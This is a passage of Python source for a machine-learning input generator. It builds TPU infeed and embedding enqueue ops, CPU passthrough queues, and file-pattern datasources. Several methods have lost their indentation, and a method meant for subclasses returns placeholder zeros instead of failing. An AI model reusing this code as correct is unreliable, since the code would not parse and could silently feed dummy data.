      # entirely, so fail fast if either has been overridden — the override
      # would silently never run.
      # pylint: disable=protected-access
      if ((self._InputBatch.__func__ is not BaseInputGenerator._InputBatch and
           self._InputBatch.__func__
           is not BaseInputGeneratorFromFiles._InputBatch) or
          self._PreprocessInputBatch.__func__
          is not BaseInputGenerator._PreprocessInputBatch):
        # pylint: enable=protected-access
        # If you hit this error trying to run with --tf_data_service_replicas,
        # try to refactor your input generator by moving all the code inside
        # _InputBatch and _PreprocessInputBatch to _DataSourceFromFilePattern.
        raise ValueError(
            'Batches obtained through p.file_datasource do not go through '
            'self._InputBatch() or self._PreprocessInputBatch(). To reduce the '
            'potential of mistakes, this error is raised when either of those '
            'functions have been overridden.')
      batch = self.datasource.GetNext()
    else:
      batch = self._PreprocessInputBatch(self._InputBatch())
    self._in_get_processed_input_batch = False
    # In unit tests, eagerly run any session-based initialization so tests
    # don't have to call Initialize() explicitly.
    if py_utils.GetUnitTestSession():
      self.Initialize(py_utils.GetUnitTestSession())
    return batch
  @property
  def tpu_number_of_shards(self):
    """Number of shards to split the input batch into."""
    p = self.params
    num_tpu_hosts = self.cluster.num_tpu_hosts
    num_infeed_hosts = num_tpu_hosts if p.use_per_host_infeed else 1
    # Number of worker devices each infeed host is responsible for.
    shards = (self.cluster.total_worker_devices // num_infeed_hosts)
    if p.use_partitioned_infeed_queue or not p.use_per_core_infeed:
      # One shard per replica (model split) rather than one per device;
      # per-core infeed is the only mode that feeds each device separately.
      shards = shards // self.cluster.num_devices_per_split
    return shards
  def CreateTpuEnqueueOps(self, job_name=None):
    """Create the host-side enqueue ops.

    This should be called in an outer non-TPU context. Builds one InfeedQueue
    (and its enqueue ops) per infeed host and records them in
    `self._tpu_queues` / `self._tpu_infeed_op`; CPU-passthrough and
    TPU-embedding sub-batches are split out and stashed for the companion
    Create*EnqueueOps methods.

    Args:
      job_name: the name of the job on which the enqueue operations run.
    """
    if not py_utils.IsEagerMode():
      assert not self._tpu_queues, (
          'CreateTpuEnqueueOps should only be called once.')
    self._tpu_queues = []
    self._per_host_batches = []
    self._per_host_emb_batches = []
    # A list of lists, where the [i][j] element is the j-th passthrought batch
    # of the i-th task. Each task will have more than one passthrought batch iff
    # sharded infeed is used.
    self._per_host_passthrough_batches = []
    p = self.params
    num_tpu_hosts = self.cluster.num_tpu_hosts
    num_cores_per_host = self.cluster.total_worker_devices // num_tpu_hosts
    tf.logging.info(
        'CreateTpuEnqueueOps num_splits_per_client={} '
        'num_devices_per_split={} num_tpu_hosts={} use_per_host_infeed={}'
        .format(self.cluster.num_splits_per_client,
                self.cluster.num_devices_per_split, num_tpu_hosts,
                p.use_per_host_infeed))
    assert num_tpu_hosts > 0, ('num_tpu_hosts: %d' % num_tpu_hosts)
    if p.use_per_core_infeed:
      # Per-core infeed only makes sense on top of per-host infeed with
      # model parallelism (see DefineInfeedParams for the supported matrix).
      if (not p.use_per_host_infeed) or p.use_partitioned_infeed_queue:
        raise ValueError('use_per_core_infeed need to have use_per_host_infeed '
                         'but not use_partitioned_infeed_queue.')
      if p.num_partitions is None or p.num_partitions <= 1:
        raise ValueError('use_per_core_infeed needs num_partitions > 1.')
    if (self.cluster.num_devices_per_split > num_cores_per_host and
        (p.use_per_host_infeed and not p.use_per_core_infeed)):
      tf.logging.fatal('Doesn\'t support per host infeed mode when '
                       'num_devices_per_split({}) > num_cores_per_host({}).'
                       'Each host must be able to accommodate >= 1 split when '
                       'using per_host_infeed.'.format(
                           self.cluster.num_devices_per_split,
                           num_cores_per_host))
    shards = self.tpu_number_of_shards
    tf.logging.info('shards {}'.format(shards))
    input_ops_list = []
    cpu_passthrough_keys = self.GetCpuPassthroughKeys()
    num_infeed_hosts = num_tpu_hosts if p.use_per_host_infeed else 1
    tf.logging.info('num_infeed_hosts: %d', num_infeed_hosts)
    host_devices = self.cluster.ListDevices(self.cluster.job_spec).flatten()
    if p.use_per_host_infeed and num_infeed_hosts != len(host_devices):
      raise ValueError(
          f'Configuration mismatch, number of infeed hosts {num_infeed_hosts} '
          f'does not match available devices {host_devices}.')
    for task_id in range(num_infeed_hosts):
      host_device = host_devices[task_id]
      if cpu_passthrough_keys and (
          '/task:{}/device:CPU:0'.format(task_id) not in host_device):
        # CreateCpuPassthroughEnqueueOps addresses hosts by task id, so the
        # device list order must agree with task numbering.
        raise ValueError(
            f'CPU passthrough configuration mismatch, device {host_device} '
            f'does not match task id {task_id}.')
      with tf.device(host_device), cluster.InfeedContextScope(
          infeed_host_index=task_id, num_infeed_hosts=num_infeed_hosts):
        batch = self.GetPreprocessedInputBatch()
        if not isinstance(batch, (list, tuple)):
          batch = [batch]
        cur_passthrough_batches = []
        for i in range(len(batch)):
          b = batch[i]
          assert isinstance(b, py_utils.NestedMap)
          # Hack: bucket_keys and xxx.bucket_keys are not needed on TPU.
          # Note that when MultiTaskData is used, bucket_keys will be at the
          # second level of the dictionary.
          b = b.FilterKeyVal(lambda k, _: not k.endswith('bucket_keys'))
          # Split out any keys that are meant for CPU passthrough only.
          cur_passthrough_batches.append(
              b.FilterKeyVal(lambda k, _: k in cpu_passthrough_keys))
          b = b.FilterKeyVal(lambda k, _: k not in cpu_passthrough_keys)
          batch[i] = b
          if i > 0:
            # If the input batch is already sharded, check that the shards are
            # compatible with each other.
            assert py_utils.IsCompatible(b, batch[0])
        self._per_host_passthrough_batches.append(cur_passthrough_batches)
        tf.logging.info('CPU passthrough keys: %s', cpu_passthrough_keys)
        if p.filter_sparse_tensors:
          # Make a copy of this host's input batch, then filter out any
          # SparseTensor features. This way, SparseTensor features are not fed
          # into the TPU InfeedQueue (and only to TPUEmbedding).
          # TODO(jeffreyzhao): Hack, come up with better solution.
          # Ideally we would like users to override
          # CreateTpuEmbeddingEnqueueOps() to modify the input batch
          # and remove fields they don't want to enqueue onto TPU.
          # However, the TPUEmbedding singleton and TPU embedding enqueue ops
          # are currently constructed after CreateTpuEnqueueOps() is called.
          emb_batch = []
          new_batch = []
          for i, b in enumerate(batch):
            emb_batch.append(
                b.Filter(lambda v: isinstance(v, tf.sparse.SparseTensor)))
            new_batch.append(
                b.Filter(lambda v: not isinstance(v, tf.sparse.SparseTensor)))
          self._per_host_emb_batches.append(emb_batch)
          batch = new_batch
        # Remember the NestedMap structure so TpuDequeueBatch can re-pack the
        # flat dequeued tensors.
        self._batch_nm_types = batch[0]
        tf.logging.info('host_device: %s, batch: %r', host_device, batch)
        self._per_host_batches.append(batch)
        for b in batch:
          for k, x in b.FlattenItems():
            assert x.shape.is_fully_defined(), (
                'Shape must be fully defined: %s: %s' % (k, x))
            # TODO(cwhipkey): if it's a string (or other type not supported on
            # TPU), drop it from feeding and on the other end add in an op that
            # fails if used.
        shapes = batch[0].Transform(lambda x: x.shape).Flatten()
        dtypes = batch[0].Transform(lambda x: x.dtype).Flatten()
        tf.logging.info('host_device: %s infeed shapes: %r', host_device,
                        shapes)
        tf.logging.info('host_device: %s infeed dtypes: %r', host_device,
                        dtypes)
        if p.use_partitioned_infeed_queue:
          device_assignment = py_utils.GetTpuDeviceAssignment(job_name)
          host_device = device_assignment.host_device(
              replica=0, job=tf.flags.FLAGS.tf_master)
          host_id = int(host_device.split('/task:')[1].split('/device:')[0])
          tf.logging.info('host_id: {} host_device: {}'.format(
              host_id, host_device))
          q = tpu_feed._PartitionedInfeedQueue(  # pylint: disable=protected-access
              number_of_tuple_elements=len(dtypes),
              device_assignment=device_assignment,
              host_id=host_id,
              input_partition_dims=[
                  [p.num_partitions] + [1] * (len(s) - 1) for s in shapes
              ],
              tuple_types=dtypes,
              tuple_shapes=shapes)
        else:
          if p.use_per_core_infeed:
            q = tpu_feed.InfeedQueue(
                tuple_types=dtypes,
                tuple_shapes=shapes,
                number_of_partitions=p.num_partitions)
          elif len(batch) > 1:
            # When the input batch is sharded, the unsharded dtypes and shapes
            # will be determined later by the generate_enqueue_ops() call.
            q = tpu_feed.InfeedQueue(
                number_of_tuple_elements=len(batch[0].Flatten()))
          else:
            q = tpu_feed.InfeedQueue(tuple_types=dtypes, tuple_shapes=shapes)
          assert shards is not None
          q.set_number_of_shards(shards)
        self._tpu_queues.append(q)
        if p.use_partitioned_infeed_queue:
          assert len(batch) == 1
          input_ops = q.generate_enqueue_ops([batch[0].Flatten()])
        elif p.use_per_host_infeed:
          # TODO(ylc/zhifengc): Add this to a policy module and test it.
          def TPUOrdinalFunction(shard_index_in_host):
            if p.use_per_core_infeed:
              return shard_index_in_host
            device_assignment = py_utils.GetTpuDeviceAssignment()
            if device_assignment:
              # We put both enqueue/dequeue ops at core 0 in each replica.
              replica = device_assignment.lookup_replicas(
                  task_id, 0)[shard_index_in_host]  # pylint: disable=cell-var-from-loop
              return device_assignment.tpu_ordinal(replica=replica)
            else:
              return shard_index_in_host

          if len(batch) > 1:
            # In this case, the `shard_index_in_host` argument of
            # `TPUOrdinalFunction` is the index of a sharded batch in the
            # `batch` list.
            input_ops = q.generate_enqueue_ops(
                [b.Flatten() for b in batch],
                placement_function=lambda x: host_device,  # pylint: disable=cell-var-from-loop
                tpu_ordinal_function=TPUOrdinalFunction)
          else:
            input_ops = q.split_inputs_and_generate_enqueue_ops(
                batch[0].Flatten(),
                placement_function=lambda x: host_device,  # pylint: disable=cell-var-from-loop
                tpu_ordinal_function=TPUOrdinalFunction)
        else:
          assert len(batch) == 1
          input_ops = q.split_inputs_and_generate_enqueue_ops(
              batch[0].Flatten(),
              device_assignment=py_utils.GetTpuDeviceAssignment(job_name))
        input_ops_list += input_ops
    tf.logging.info('input_ops_list %s', input_ops_list)
    grouped_infeed_op = tf.group(*input_ops_list)
    self._tpu_infeed_op = []
    # Duplicate the grouped op so multiple python threads can each drive a
    # session.run on it concurrently.
    for _ in range(p.tpu_infeed_parallelism):
      self._tpu_infeed_op.append(grouped_infeed_op)
  def TpuDequeueBatch(self):
    """Create TPU dequeue ops.

    This should only be called within a TPU context.

    Returns:
      - A NestedMap of the input batch.
    """
    assert self._tpu_queues, 'CreateTpuEnqueueOps must be called first.'
    with tf.device(tf.tpu.core(0)):
      # Note that the dequeue_tuple op on the TPU core
      # only cares about the shape/types being dequeued
      # which is why this is hard-coded to the first Queue.
      tensors = self._tpu_queues[0].generate_dequeue_op()
    # Re-pack the flat tensor list into the NestedMap structure recorded by
    # CreateTpuEnqueueOps.
    return self._batch_nm_types.Pack(tensors)
  def CreateTpuEmbeddingEnqueueOps(self):
    """Creates the TpuEmbedding enqueue ops on all hosts.

    Note that this must be called after the instantiation of the
    monolithic TPUEmbeddingLayer. Appends the generated enqueue ops (as one
    grouped op) to `self._tpu_infeed_op`. No-ops when TPU embedding is
    disabled or unused.
    """
    p = self.params
    if self._tpu_embedding_mode is None:
      return
    tpu_embedding_collection = tpu_embedding_layers.TpuEmbeddingCollection.Get()
    tpu_embedding = tpu_embedding_collection.tpu_embedding
    if not tpu_embedding:
      return
    num_tpu_hosts = self.cluster.num_tpu_hosts
    num_infeed_hosts = num_tpu_hosts if p.use_per_host_infeed else 1
    # When filter_sparse_tensors is set, CreateTpuEnqueueOps stashed the
    # SparseTensor-only sub-batches separately for embedding enqueue.
    input_batches = (
        self._per_host_emb_batches
        if p.filter_sparse_tensors else self._per_host_batches)
    assert len(input_batches) == num_infeed_hosts
    enqueue_ops = []
    if num_tpu_hosts > 1 and not p.use_per_host_infeed:
      # Single-host infeed feeding a multi-host topology: build all enqueue
      # data on task 0, then redistribute per (host, core).
      batch = input_batches[0]
      assert len(batch) == 1, "Tpu Embedding doesn't support sharded inputs."
      with tf.device('/task:0/device:CPU:0'):
        batch = self.PreprocessTpuEmbeddingInputBatch(batch[0])
        # When not using per-host infeed, we use `self.tpu_number_of_shards`
        # when splitting the inputs, so `num_tpu_hosts` is taken into account.
        all_enqueue_data = self._GetTpuEmbeddingEnqueueData(
            tpu_embedding, batch, self.tpu_number_of_shards)
      # Translate replica index to (host_device, tpu_ordinal). The mechanism
      # need to be the same as the one for other tpu infeed, so that the same
      # split of tpu-embedding and non-tpu-embedding inputs are sent to the
      # same core. See CreateTpuEnqueueOps() for more details.
      num_cores_per_host = tpu_embedding.num_cores_per_host
      enqueue_data_per_host = {}
      device_assignment = py_utils.GetTpuDeviceAssignment()
      for replica_index, per_replica_data in enumerate(all_enqueue_data):
        host_device = device_assignment.host_device(replica=replica_index)
        core = device_assignment.tpu_ordinal(replica=replica_index)
        assert core < num_cores_per_host
        if host_device not in enqueue_data_per_host:
          enqueue_data_per_host[host_device] = [None] * num_cores_per_host
        assert enqueue_data_per_host[host_device][core] is None
        enqueue_data_per_host[host_device][core] = per_replica_data
      assert len(enqueue_data_per_host) == num_tpu_hosts
      for host_device, src_enqueue_data in enqueue_data_per_host.items():
        with tf.device(host_device):
          # TF's `TPUEmbedding` colocates the enqueue ops with the input
          # tensors, so we add a tf.identity here to ensure they are copied to
          # `host_device` before generating the enqueue ops.
          dst_enqueue_data = [
              {} for _ in range(tpu_embedding.num_cores_per_host)
          ]
          # src_enqueue_data is a list of dicts, one for each core.
          for i, data_dict in enumerate(src_enqueue_data):
            assert data_dict, src_enqueue_data
            for key, data in data_dict.items():
              dst_enqueue_data[i][key] = tpu_embedding_lib.EnqueueData(
                  embedding_indices=tf.identity(data.embedding_indices),
                  sample_indices=tf.identity(data.sample_indices)
                  if data.sample_indices is not None else None,
                  aggregation_weights=tf.identity(data.aggregation_weights)
                  if data.aggregation_weights is not None else None)
          tf.logging.info('host_device: %s, enqueue_data: %r', host_device,
                          dst_enqueue_data)
          enqueue_ops += tpu_embedding.generate_enqueue_ops(
              dst_enqueue_data, mode_override=self._tpu_embedding_mode)
    else:
      # Per-host infeed (or a single host): each host enqueues its own batch.
      assert tpu_embedding.num_cores_per_host == self.tpu_number_of_shards
      for task_id in range(num_tpu_hosts):
        host_device = '/task:{}/device:CPU:0'.format(task_id)
        batch = input_batches[task_id]
        assert len(batch) == 1, "Tpu Embedding doesn't support sharded inputs."
        with tf.device(host_device):
          batch = self.PreprocessTpuEmbeddingInputBatch(batch[0])
          tf.logging.info('host_device: %s, batch: %r', host_device, batch)
          enqueue_data = self._GetTpuEmbeddingEnqueueData(
              tpu_embedding, batch, tpu_embedding.num_cores_per_host)
          enqueue_ops += tpu_embedding.generate_enqueue_ops(
              enqueue_data, mode_override=self._tpu_embedding_mode)
    self._tpu_infeed_op.append(tf.group(*enqueue_ops))
  def _GetTpuEmbeddingEnqueueData(self, tpu_embedding, input_batch, num_splits):
    """Get a list of per-core TPU embedding enqueue data.

    Args:
      tpu_embedding: The monolithic TpuEmbedding object.
      input_batch: The input batch used to generate the enqueue data.
      num_splits: The number of shards to split the inputs into in order to get
        per-core inputs, before generating enqueue data.

    Returns:
      A list of `num_splits` enqueue elements, where each element is a dict of
      feature_name -> `tpu_embedding_lib.EnqueueData`.
    """
    assert isinstance(input_batch, py_utils.NestedMap)
    tpu_emb_input_keys = list(tpu_embedding.feature_to_config_dict.keys())
    tf.logging.info('tpu_emb_input_keys: %r', tpu_emb_input_keys)
    enqueue_data = [{} for _ in range(num_splits)]
    # Get enqueue data for each replica.
    for key in tpu_emb_input_keys:
      feat = input_batch.GetItem(key)
      if isinstance(feat, tf.sparse.SparseTensor):
        # Sparse features split directly along the batch dimension.
        tpu_emb_feat_splitted = tf.sparse.split(feat, num_splits, axis=0)
        for i, split in enumerate(tpu_emb_feat_splitted):
          enqueue_data[i][key] = (
              tpu_embedding_lib.EnqueueData.from_sparse_tensor(split))
      else:
        tpu_emb_feat_splitted = tf.split(feat, num_splits)
        for i, split in enumerate(tpu_emb_feat_splitted):
          # Dense to sparse. Note the assumption of a padding id.
          # NOTE(review): -1 is assumed to be the padding id here — entries
          # equal to -1 are dropped from the enqueue data.
          sample_indices = tf.where(tf.not_equal(split, -1))
          embedding_indices = tf.gather_nd(split, sample_indices)
          enqueue_data[i][key] = tpu_embedding_lib.EnqueueData(
              embedding_indices, sample_indices)
    return enqueue_data
def PreprocessTpuEmbeddingInputBatch(self, input_batch):
"""Hook to manipulate the TPU embedding input batch.
Used by CreateTpuEmbeddingEnqueueOps(). Override this method in input
generators to preprocess the TPU embedding inputs before using them to
generate enqueue ops.
Args:
input_batch: The input batch to process.
Returns:
The preprocessed TPU embedding input batch.
"""
return input_batch
def GetCpuPassthroughKeys(self):
"""Return a list of keys from the input to skip sending to the device.
When running on TPU, a user may want to avoid sending some inputs to the
device; either the type is not supported (e.g., string), or the input will
not be processed on the device at all. However, these items may be still
useful to passthrough to the "output", e.g., for decoding purposes.
This function should return a list of keys from InputBatch() that should not
be sent to the TPU, but can be combined with the outputs of Decode() before
passing to PostProcessDecodeOut().
Returns:
A list of keys from the input to filter from being sent to the device,
which may be combined with the output of Decode() prior to
PostProcessDecodeOut().
"""
return []
  def CreateCpuPassthroughEnqueueOps(self):
    """Creates enqueue ops to pass through CPU inputs to the output.

    Builds one host-side FIFO queue per infeed host holding the
    CPU-passthrough sub-batches split out by CreateTpuEnqueueOps, and appends
    the grouped enqueue op to `self._tpu_infeed_op`. No-ops when there are no
    passthrough keys.
    """
    p = self.params
    num_tpu_hosts = self.cluster.num_tpu_hosts
    num_infeed_hosts = num_tpu_hosts if p.use_per_host_infeed else 1
    cpu_passthrough_keys = self.GetCpuPassthroughKeys()
    if not cpu_passthrough_keys:
      return

    # There is one enqueue op per host.
    self._host_queues = {}
    enqueue_ops = []
    assert len(self._per_host_batches) == num_infeed_hosts
    for task_id in range(num_infeed_hosts):
      host_device = '/task:{}/device:CPU:0'.format(task_id)
      batch = self._per_host_passthrough_batches[task_id]
      assert isinstance(batch, list)
      with tf.device(host_device):
        # Remember the NestedMap structure for DequeueCpuPassthrough's Pack.
        self._cpu_nm_types = batch[0] if len(batch) == 1 else batch
        tf.logging.info('host_device CPU passthrough types: %s, batch: %r',
                        host_device, batch)
        cpu_dtypes = py_utils.Flatten(
            py_utils.Transform(lambda x: x.dtype, batch))
        # NOTE: we use a large capacity queue under the assumption that the size
        # of these tensors will be generally smaller than that sent to the TPU,
        # and that the TPU queue will likely fill up before the host queue,
        # blocking further enqueues.
        host_queue = tf.queue.FIFOQueue(capacity=10000, dtypes=cpu_dtypes)
        self._host_queues[task_id] = host_queue
        enqueue_ops += [host_queue.enqueue(py_utils.Flatten(batch))]
    self._tpu_infeed_op.append(tf.group(*enqueue_ops))
  def DequeueCpuPassthrough(self, concat=True):
    """Create CPU dequeue ops.

    Args:
      concat: Whether to concat the passthrough batches for each host into one
        batch.

    Returns:
      None if there are no CPU passthrough values. Otherwise, a NestedMap of
      the CPU passthrough input batch if `concat`, or a list of NestedMaps
      (one for each host) if not `concat`.
    """
    cpu_passthrough_keys = self.GetCpuPassthroughKeys()
    if not cpu_passthrough_keys:
      return None
    p = self.params
    num_tpu_hosts = self.cluster.num_tpu_hosts
    num_infeed_hosts = num_tpu_hosts if p.use_per_host_infeed else 1
    tensor_list = []
    for task_id in range(num_infeed_hosts):
      # Dequeue on the same host that enqueued (see
      # CreateCpuPassthroughEnqueueOps) to avoid cross-host copies here.
      with tf.device('/task:{}/device:CPU:0'.format(task_id)):
        tensors = self._host_queues[task_id].dequeue()
        # Make list if only one tensor.
        if not isinstance(tensors, list):
          tensors = [tensors]
        tensor_list.append(tensors)

    # TODO(laigd): consider moving the concat logic out to make the API simpler.
    if concat:
      with tf.device('/task:0/device:CPU:0'):
        # Transpose to get per-dequeue-element tuples, then concat.
        result = list(map(lambda xs: tf.concat(xs, axis=0), zip(*tensor_list)))
      return py_utils.Pack(self._cpu_nm_types, result)
    # Return a list of batches, one per host.
    return [py_utils.Pack(self._cpu_nm_types, xs) for xs in tensor_list]
@property
def tpu_infeed_op(self):
if self._tpu_infeed_op is not None:
return self._tpu_infeed_op
else:
raise ValueError('TPU infeed op not set. Call CreateTpuEnqueueOps first.')
  @property
  def merged_input_data_summary_op(self):
    """Merged TF scalar summary op for input data stats; may be None."""
    return self._merged_input_data_summary_op
  @property
  def input_data_summary_layout(self):
    """Tensorboard layout for input-data-stats charts; may be None."""
    return self._input_data_summary_layout
def SplitInputBatch(self, num_splits):
"""Splits the current InputBatch into num_splits ways.
Args:
num_splits: The number of splits.
Returns:
A list of `.NestedMap`. Each `.NestedMap` represents the input
tensors in one split.
"""
assert num_splits >= 1
batch = self.GetPreprocessedInputBatch()
if num_splits == 1:
# Special case. No split is needed.
return [batch]
assert not py_utils.use_tpu()
field_split = ig_helper.SplitTensors(batch.Flatten(), num_splits)
num_fields = len(field_split)
ret = []
for j in range(num_splits):
split_flatten = [field_split[i][j] for i in range(num_fields)]
split = batch.Pack(split_flatten)
ret += [split]
return ret
  def Reset(self, sess):
    """Reset the input-generator.

    Override so that the input_generator reproduces examples as if from a
    fresh instantiation. Required when `params.resettable` is True.

    Args:
      sess: A tensorflow session.

    Raises:
      NotImplementedError: Always in the base class; subclasses must override.
    """
    raise NotImplementedError()
@property
def _map_args(self):
"""Default args for tf.data.DataSet.map()."""
return {
'num_parallel_calls':
1 if self.cluster.in_unit_test else tf.data.experimental.AUTOTUNE,
'deterministic':
self.cluster.require_sequential_input_order
}
def FilePatternToDataSource(p):
  """Helper to turn p.file_pattern (deprecated) into p.file_datasource.

  Args:
    p: Input generator `Params` carrying the deprecated `file_pattern` field
      (a string, a list/tuple of strings, or a list of
      <file_pattern, weight, [bprop_variable_filter]> tuples).

  Returns:
    A datasource params object equivalent to `p.file_pattern`, wrapped with
    tf.data service + prefetch params when a service address is configured.

  Raises:
    ValueError: If `p.file_pattern` cannot be parsed.
  """
  if isinstance(p.file_pattern, str):
    ds = datasource.SimpleDataSource.Params().Set(file_pattern=p.file_pattern)
  elif isinstance(p.file_pattern, (list, tuple)):
    if all([isinstance(x, str) for x in p.file_pattern]):
      # While this violates the documentation and intended use, there are
      # subclasses that have used a tuple of strings, rather than a list of
      # string, weight tuples. Rather than treating lists and tuples
      # differently, support both here until p.file_pattern is removed.
      ds = datasource.SimpleDataSource.Params().Set(
          file_pattern=list(p.file_pattern))
    elif p.use_within_batch_mixing:
      if max(list(map(len, p.file_pattern))) >= 3:
        # Within batch mixing doesn't work with backprop filters, i.e. when
        # file_pattern param contains a list of
        # <file_pattern, weight, [bprop_variable_filter]> tuples.
        raise ValueError('Expected a list of pairs, got %s' % p.file_pattern)
      file_patterns, weights = (list(x) for x in zip(*p.file_pattern))
      ds = datasource.SimpleDataSource.Params().Set(
          file_pattern=file_patterns, weights=weights)
    else:
      # Otherwise fall back to MixByWeight-based approach.
      datasources = []
      weights = []
      bprop_variable_filters = []
      for source_id, input_entry in enumerate(p.file_pattern):
        if isinstance(input_entry, str):
          raise ValueError('Should explicitly specify weights, got string: %s' %
                           input_entry)
        file_pattern, weight = input_entry[:2]
        datasources.append(
            datasource.SimpleDataSource.Params().Set(file_pattern=file_pattern))
        # This is essentially a bug fix, but we only enable it based on this
        # param to maintain backward compatibility.
        if not p.all_zero_source_id_without_within_batch_mixing:
          # SimpleDataSource will output source_id=0. We use source_id_offset
          # to correct this.
          datasources[-1].Set(source_id_offset=source_id)
        weights.append(weight)
        bprop_variable_filter = input_entry[2] if len(input_entry) > 2 else ''
        bprop_variable_filters.append(bprop_variable_filter)
      ds = datasource.CrossBatchMixingDataSource.Params().Set(
          sub=datasources,
          weights=weights,
          bprop_variable_filters=bprop_variable_filters)
  else:
    raise ValueError('Cannot parse p.file_pattern into a datasource.')

  if cluster_factory.Current().tf_data_service_address:
    bucket_upper_bound = None
    if 'bucket_upper_bound' in p:
      bucket_upper_bound = p.bucket_upper_bound
    ds = datasource.TFDataServiceSource.Params().Set(
        sub=ds, bucket_upper_bound=bucket_upper_bound)
    ds = datasource.TFDatasetPrefetch.Params().Set(sub=ds)
  return ds
class BaseInputGeneratorFromFiles(BaseInputGenerator):
  """Base class for input generators that reads from files.

  Subclasses should implement _DataSourceFromFilePattern.
  """

  @classmethod
  def Params(cls):
    """Defaults params for input generators."""
    p = super().Params()
    p.Define(
        # NOTE: file_pattern is deprecated. New params should use
        # file_datasource instead.
        # TODO(b/139345706) remove file_pattern parameter
        'file_pattern',
        '',
        'A single file pattern string, a list of file pattern strings or a list'
        ' of <file_pattern, weight> pairs or a list of <file_pattern, weight, '
        'bprop_variable_filter> tuples. Some of the cases may not be supported '
        'with use_within_batch_mixing, where probablistic samples are from the '
        'inputs proportional to their weights. Typically, values are binary '
        'protocol buffers containing train/eval samples. Keys are not used.')
    p.Define('file_random_seed', 301,
             'Random seed for shuffling the input data.')
    p.Define(
        'file_buffer_size', 10000,
        'How many records are buffered for random shuffling. This param '
        'affects how much RAM a train/test job needs. E.g., if an average '
        'record is about 500KB, the buffer needs 5GB ram.')
    p.Define(
        'file_buffer_size_in_seconds', 0,
        'If non-zero, keep enough records in the buffer to handle N seconds '
        'worth of demand. E.g., if the training job is reading 1000 records '
        'per second and this parameter is set to 10, the buffer is resized '
        'to contain 10000 records. This parameter is useful when reading from '
        'many data sources at different speeds, as it automatically tunes the '
        'size of buffers to fit demand. The file_buffer_size parameter is an '
        'upper bound to the buffer size.')
    p.Define('file_parallelism', 16, 'How many files to read concurrently.')
    p.Define(
        'flush_every_n', 0, 'If non-zero, flushes all batches buffered '
        'so far every these many records are yielded.')
    p.Define('num_batcher_threads', 1, 'Number of threads to use for input '
             'record batcher.')
    p.Define(
        'repeat_count', -1,
        'Number of repetitions of a dataset before throwing OutOfRange error '
        'when using require_sequential_input_order. Must only be set if '
        'cluster.require_sequential_input_order is True.')
    # TODO(b/139345706) when file_pattern is deleted use_within_batch_mixing
    # will be specified by setting weights in SimpleDataSource in
    # p.file_datasource and this param should be deleted as well.
    p.Define(
        'use_within_batch_mixing', False, 'Whether to mix records from '
        'different input sources within batch or across batches (the '
        'default option). This option only takes effect when file_pattern'
        ' is a list of file patterns with weights. Note: without mixing, all'
        ' source_id values for records will be set to 0 unless '
        'all_zero_source_id_without_within_batch_mixing is set to False.')
    p.Define(
        'all_zero_source_id_without_within_batch_mixing', True,
        'When set (by default) and use_within_batch_mixing is false, all '
        'record.source_id values returned will be 0. This is most likely '
        'undesired behavior, but enables backwards compatibility with previous '
        'work. Only classes that have _DataSourceFromFilePattern take a '
        'input_source_id_offset argument can handle this flag being False.')
    return p

  def __init__(self, params):
    """Initializes the generator.

    Raises:
      ValueError: if per-host infeed is combined with a non-zero file seed;
        a fixed seed would make every host read the identical record stream.
    """
    if params.use_per_host_infeed and params.file_random_seed != 0:
      raise ValueError('file_random_seed needs to be 0 when '
                       'use_per_host_infeed == True.')
    super().__init__(params)

  def CreateDatasource(self):
    """Converts the deprecated p.file_pattern into p.file_datasource."""
    p = self.params
    # Exactly one of the two input-definition mechanisms may be used.
    assert not (
        p.file_pattern and p.file_datasource
    ), 'Only one of file_pattern and file_datasource can be specified'
    if not p.file_datasource:
      p.file_datasource = FilePatternToDataSource(p)
      # TODO(b/139345706) remove support for file_pattern
      # p.file_pattern = ''
    super().CreateDatasource()

  def CommonInputOpArgs(self):
    """Common input params.

    Returns:
      A dict of keyword args shared by the underlying input ops, merged with
      the bucketing args from _InputOpBucketingArgs().
    """
    p = self.params
    args = super().CommonInputOpArgs()
    # Default to a single-replica setup unless an infeed context says
    # otherwise (e.g. multi-host TPU infeed).
    num_input_replicas = 1
    input_replica_id = 0
    infeed_context = cluster.GetInfeedContext()
    if infeed_context:
      num_input_replicas = infeed_context.num_infeed_hosts
      input_replica_id = infeed_context.infeed_host_index
      tf.logging.info('input_replica_id=%s/%s', input_replica_id,
                      num_input_replicas)
    # Legacy behavior for Lingvo input ops: require_sequential_order defaults to
    # False for eval jobs. Note that this value is different from
    # self.cluster.require_sequential_input_order.
    require_sequential_order = bool(
        self.cluster.params.require_sequential_input_order)
    args.update({
        'file_random_seed': p.file_random_seed,
        'file_buffer_size': p.file_buffer_size,
        'file_parallelism': p.file_parallelism,
        'file_buffer_size_in_seconds': p.file_buffer_size_in_seconds,
        'flush_every_n': p.flush_every_n,
        'num_threads': p.num_batcher_threads,
        'require_sequential_order': require_sequential_order,
        'repeat_count': p.repeat_count,
        'num_input_replicas': num_input_replicas,
        'input_replica_id': input_replica_id,
    })
    args.update(self._InputOpBucketingArgs())
    return args

  def _InputOpBucketingArgs(self):
    # Single catch-all bucket; sequence subclasses override with real buckets.
    return {
        'bucket_upper_bound': [1000000],
        'bucket_batch_limit': [self.InfeedBatchSize()],
        'bucket_adjust_every_n': 0,
    }

  def _InputBatch(self):
    return self._BuildDataSource()

  # TODO(b/139345706): After p.file_pattern is deleted, the following functions
  # _DataSourceFromFilePattern, _BuildDataSourceWithMetadata, _BuildDataSource
  # can be deleted and functionality moved to using the DataSource directly.
  def _DataSourceFromFilePattern(self,
                                 file_pattern,
                                 input_source_weights=None,
                                 input_source_id_offset=0):
    """Return a NestedMap containing an input batch from a string file_pattern.

    Subclasses should implement this function.

    Args:
      file_pattern: A string file pattern.
      input_source_weights: A list of float input source weights to control
        input example mix in the batch. The records will be sampled from inputs
        proportionally to these weights. Defaults to None which should be
        treated as an empty list.
      input_source_id_offset: All source_ids returned from datasource will be
        offset by this value.

    Returns:
      A `.NestedMap` of tf.Tensors containing a batch of input data with shapes
      [batch, ...].
    """
    # Placeholder implementation; real subclasses return actual data.
    return py_utils.NestedMap(x=tf.zeros([1]))

  def _BuildDataSourceWithMetadata(self):
    """Read and return input batch from `p.file_pattern`.

    `p.file_pattern` may be a string file_pattern or a
    list of (file_pattern, weight, [bprop_variable_filter]) tuples.
    bprop_variable_filter is optional. When bprop_variable_filter is used,
    batches will always contain the examples from the same source. Otherwise,
    examples from different sources may be mixed together.

    Returns:
      A `.NestedMap` containing

      - data: `.NestedMap` of tf.Tensor as in `_DataSourceFromFilePattern()`.
      - source_selected: optional tensor of size [batch_size, #datasources].
      - selected_bprop: optional tensor of size [#datasources].
